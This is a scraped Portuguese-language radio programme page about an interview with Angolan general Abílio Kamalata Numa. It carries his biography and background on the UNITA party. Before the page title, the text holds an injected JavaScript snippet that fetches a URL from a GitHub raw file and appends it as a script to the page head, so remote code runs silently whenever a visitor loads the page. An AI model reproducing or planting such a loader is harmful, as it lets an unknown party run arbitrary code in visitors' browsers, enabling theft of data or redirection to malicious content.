;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Grande Entrevista, Rádio Mais | RadioPlayDigital
Grande Entrevista, edição com Kamalata Numa

Abílio José Augusto Kamalata Numa, filho de Ernesto Kamalata e Rita Chipondia, nasceu aos 31 de Agosto de 1955 na cidade de Cubal – Província de Benguela.

Fez o ensino primário na cidade de Nova Lisboa (actual Huambo) e Espírito Santo na cidade da Babaeira/Bela Vista/Huambo.

O ensino Secundário até ao 5º ano Liceal no Seminário Menor do Espírito santo na cidade da Nova Lisboa e o 7º ano Liceal no Colégio Admastor também na cidade de Nova Lisboa.

Em 1974 incorporou as fileiras da UNITA foi militar, frequentando Cursos de Comando e Estado – maior, cursos de Estratégia e formação superior em Ciências politicas no centro de estudos Comandante Kapessi Kafundanga. Atingiu o posto de General de quatro estrelas.

Em 1991, incorporou o projecto de fundação das FAA (Forças Armadas Angolanas), onde foi co-fundador com o posto de General de três estrelas, tendo frequentado também o curso Superior de Gestão Financeira pela UCB (Universidade Católica de Brasília)

 

A União Nacional para a Independência Total de Angola (UNITA) é um partido político angolanoorientado no espectro do centro à direita, sendo a maior e mais organizada agremiação nacional de oposição desde 1976.

Foi fundada em 1966 por dissidentes da Frente Nacional de Libertação de Angola (FNLA) e do Governo de Resistência de Angola no Exílio (GRAE), de que Jonas Savimbi, líder-fundador do partido, era ministro das relações exteriores. Lutou ao lado da FNLA e do Movimento Popular de Libertação de Angola (MPLA) pela independência angolana, partindo para uma longa Guerra Civil Angolana em que recebeu ajuda militar principalmente dos Estados Unidos e da África do Sul, enquanto que o MPLA recebeu apoio da União Soviética e seus aliados. Desde o fim da Guerra Civil em 2002 a UNITA abandonou a luta armada, convertendo-se num partido político.

A UNITA e seus militantes são conhecidos pelo acrónimo “galo negro”, em referência a figura de um galo presente na bandeira do partido, bem como “unitenses”.

Data de Emissão: 13-03-2023 às 13:00
Género(s): Entrevista
Tópicos(s): FNLA, MPLA, UNITA, UPA
PARTICIPANTES

Relacionados